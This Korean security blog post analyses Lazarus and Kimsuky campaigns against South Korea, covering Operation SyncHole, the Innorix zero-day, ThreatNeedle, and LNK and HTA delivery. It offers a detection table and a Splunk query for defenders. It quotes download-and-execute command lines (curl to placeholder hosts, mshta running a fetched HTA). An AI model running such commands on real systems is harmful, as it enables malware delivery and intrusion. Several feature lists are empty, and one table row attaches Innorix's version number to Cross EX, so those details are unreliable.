Lazarus와 Kimsuky가 2026년 2월까지 한국을 대상으로 감행한 58건의 APT 공격 분석. Operation SyncHole 공급망 침투, LNK 파일 공격 트렌드, 커스텀 가능한 Splunk 탐지 쿼리 제공.
댓글은 익명으로 작성되며, 삭제 비밀번호를 설정하면 본인만 삭제할 수 있습니다. 비밀번호를 설정하지 않은 댓글은 누구나 삭제할 수 있습니다.
2024년 11월, 한국의 주요 IT 기업 보안팀은 이상한 신호를 감지했다. Cross EX 소프트웨어가 평소와 다른 동작을 보였고, 합법적인 프로세스인 SyncHost.exe가 실행됐다. 그런데 그 안에는 셸코드가 숨어 있었다.
안랩의 2025년 사이버 위협 보고서에 따르면, 2024년 10월부터 2025년 9월까지 북한 연계 APT 그룹이 한국을 대상으로 58건의 공격을 감행했다. Lazarus가 31건, Kimsuky가 27건이었다.
2024년 11월부터 2025년 2월까지, Lazarus는 Operation SyncHole이라는 이름의 캠페인을 통해 최소 6개 한국 기업을 침해했다. 표적은 IT, 금융, 반도체, 통신 분야였다.
| 단계 | 방법 | 설명 |
|---|---|---|
| 1. 침투 | 워터링 홀 | 한국 주요 포털 사이트에 서버 측 스크립트 삽입 |
| 2. 프로파일링 | 방문자 선별 | 특정 조직 IP → 악성 도메인으로 리디렉션 |
| 3. 취약점 악용 | Cross EX, Innorix Agent | 금융/공공기관에서 필수로 설치하는 소프트웨어 공격 |
Innorix Agent 제로데이 (KVE-2025-0014)
Innorix Agent 버전 9.2.18.496에는 원격 코드 실행 취약점이 있었다. 이 소프트웨어는 한국 금융권과 공공기관에서 보안 파일 전송용으로 광범위하게 사용되고 있었다.
Kaspersky가 이 취약점을 발견하고 KrCERT와 개발사에 보고했을 때, 이미 여러 조직이 침해된 후였다.
Lazarus는 합법적인 SyncHost.exe 프로세스를 실행한 뒤 셸코드를 주입하는 방식으로 ThreatNeedle 백도어를 설치했다.
ThreatNeedle은 37개 명령을 수행할 수 있으며, 다음 기능을 포함한다:
추가로 배포된 도구:
Kimsuky는 2025년 동안 5개의 별도 캠페인을 수행했다. 표적은 국방 산업, 정부 연구기관, 금융 기관이었다.
2025년 Kimsuky 공격의 가장 큰 특징은 정찰 단계와 실제 공격의 분리였다.
초기 침투에서는 키로거와 정보 수집 도구만 배포했다. 최종 표적으로 선별된 조직에만 실제 백도어와 데이터 탈취 모듈을 투입하는 2단계 전략을 사용했다.
Kimsuky가 스피어 피싱에 사용한 미끼:
HWP 문서 → 배치 스크립트 → PowerShell → JavaScript → C2 통신
모든 단계에서 AES-256 암호화를 사용했으며, 복호화 키는 일관되게 유지됐다. 이는 탐지를 회피하면서도 운영 효율성을 유지하기 위한 선택이었다.
안랩의 2026년 2월 APT 동향 보고서에 따르면, LNK 파일이 가장 많이 사용된 공격 수단으로 등장했다.
curl.exe -o C:\Users\Public\malware.exe https://악성도메인/payload
다운로드된 AutoIt 스크립트는 다음 기능을 수행한다:
공격자는 GitHub 저장소나 Google Drive에 악성 HTA 파일을 호스팅했다.
curl.exe -o %TEMP%\update.hta https://github.com/[계정]/[저장소]/blob/main/payload.hta
mshta.exe %TEMP%\update.hta
HTA 파일은 메모리에 로드되며:
| 항목 | 탐지 방법 |
|---|---|
| LNK 파일 | .lnk 파일의 PowerShell/CMD 실행 모니터링 |
| Cross EX 악용 | 버전 9.2.18.496 이하 → 즉시 패치 |
| Innorix Agent | KVE-2025-0014 패치 적용 확인 |
| ThreatNeedle | SyncHost.exe + 셸코드 주입 패턴 |
| HTA 실행 | mshta.exe 네트워크 연결 모니터링 |
⚠️ 중요: 아래 쿼리는 기본 예시이며, 반드시 환경에 맞게 커스터마이징해야 합니다.
index=windows EventCode=4688
| search (Process="*\\curl.exe" AND CommandLine="*-o*")
OR (Process="*\\mshta.exe" AND CommandLine="*http*")
OR (Process="*\\SyncHost.exe" AND ParentProcess!="explorer.exe")
| table _time Computer User Process CommandLine
2025년 한국을 대상으로 한 북한 APT 공격은 전략적 진화를 보여줬다.
Lazarus는 공급망 공격으로 전환하여 널리 사용되는 소프트웨어의 제로데이를 악용했다. Kimsuky는 정찰과 실제 공격을 분리하여 탐지를 회피하면서 최종 표적에만 자원을 집중했다.
2026년에도 이 추세는 계속되고 있다. LNK 파일과 HTA를 활용한 공격이 주류가 되고 있으며, GitHub와 Google Drive 같은 합법적 플랫폼을 악용하는 경우가 늘어나고 있다.
방어의 핵심은 소프트웨어 패치와 행위 기반 탐지다. 특히 금융권과 공공기관에서 필수로 사용하는 소프트웨어가 공격 표적이 되고 있으므로, 공급망 보안에 대한 지속적인 모니터링이 필요하다.
AI 활용 안내 이 글은 AI(Claude)의 도움을 받아 작성되었습니다. 인용된 통계와 사례는 참고 자료에 명시된 출처에 근거하며, 설명을 위한 일부 표현은 각색되었습니다.
면책 조항 본 글은 보안 인식 제고를 위한 교육 목적으로 작성되었습니다. 언급된 공격 기법을 실제로 시도하는 행위는 「정보통신망법」, 「형법」 등에 따라 처벌받을 수 있으며, 본 블로그는 이에 대한 법적 책임을 지지 않습니다.